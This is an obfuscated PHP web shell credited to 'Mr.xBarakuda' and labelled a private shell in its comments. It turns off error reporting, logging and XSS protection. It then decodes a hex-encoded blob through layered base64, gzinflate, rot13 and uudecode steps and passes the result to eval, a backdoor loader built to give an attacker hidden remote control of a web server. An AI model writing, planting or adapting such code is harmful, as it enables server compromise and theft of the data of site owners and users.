<?php
// Hard Cod3d By Mr.xBarakuda
// Private Shell at http://pastebin.com/raw/fM3wRnbd
session_start();
error_reporting(0);
header('X-XSS-Protection: 0');
@set_time_limit(0);
@set_magic_quotes_runtime(0);
@clearstatcache();
@ini_set('error_log',NULL);
@ini_set('log_errors',0);
@ini_set('max_execution_time',0);
@ini_set('output_buffering',0);
@ini_set('display_errors',0);
function KudaXxX($c0d3) {
$K="\x62\x61\x73\x65\x36\x34\x5f\x64\x65\x63\x6f\x64\x65";$U="\x67\x7a\x69\x6e\x66\x6c\x61\x74\x65";$D="\x73\x74\x72\x5f\x72\x6f\x74\x31\x33";$A="\x63\x6f\x6e\x76\x65\x72\x74\x5f\x75\x75\x64\x65\x63\x6f\x64\x65";$X="\x67\x7a\x69\x6e\x66\x6c\x61\x74\x65";$S="\x62\x61\x73\x65\x36\x34\x5f\x64\x65\x63\x6f\x64\x65";
@eval($K($U($D($A($X($S($c0d3)))))));
}
$HelL = "\x42\x63\x48\x52\x46\x6b\x49\x77\x41\x41\x44\x51\x39\x2f\x33\x46\x73\x70\x62\x55\x45\x70\x49\x35\x78\x6f\x54\x61\x47\x6c\x4d\x6e\x78\x4b\x48\x69\x2f\x37\x2b\x69\x65\x37\x56\x42\x65\x34\x4b\x6b\x6d\x65\x49\x46\x38\x68\x66\x44\x37\x43\x4e\x75\x30\x4f\x37\x75\x30\x48\x33\x6c\x2f\x46\x78\x35\x43\x49\x58\x4f\x4d\x5a\x37\x7a\x4e\x69\x52\x35\x50\x74\x57\x30\x56\x34\x30\x79\x58\x46\x6c\x6d\x47\x65\x45\x4f\x30\x47\x4c\x39\x4e\x67\x59\x2f\x57\x6c\x61\x56\x2b\x55\x76\x52\x34\x79\x6a\x33\x37\x4d\x5a\x47\x2b\x66\x57\x33\x6d\x79\x4c\x72\x78\x44\x32\x51\x59\x31\x43\x36\x39\x6c\x43\x59\x4c\x6b\x6c\x45\x52\x77\x35\x55\x7a\x64\x38\x47\x57\x6d\x31\x31\x43\x6f\x46\x57\x30\x2f\x56\x35\x61\x71\x64\x79\x66\x33\x33\x55\x58\x6f\x71\x49\x74\x63\x57\x79\x39\x6d\x49\x4e\x4f\x63\x46\x46\x2b\x51\x77\x6f\x58\x2b\x44\x75\x4e\x30\x56\x4f\x72\x31\x55\x71\x45\x6d\x72\x4a\x51\x7a\x79\x50\x4c\x4f\x76\x57\x43\x51\x57\x34\x75\x55\x52\x2b\x4f\x41\x38\x47\x57\x4d\x41\x66";
KudaXxX($HelL);
?>
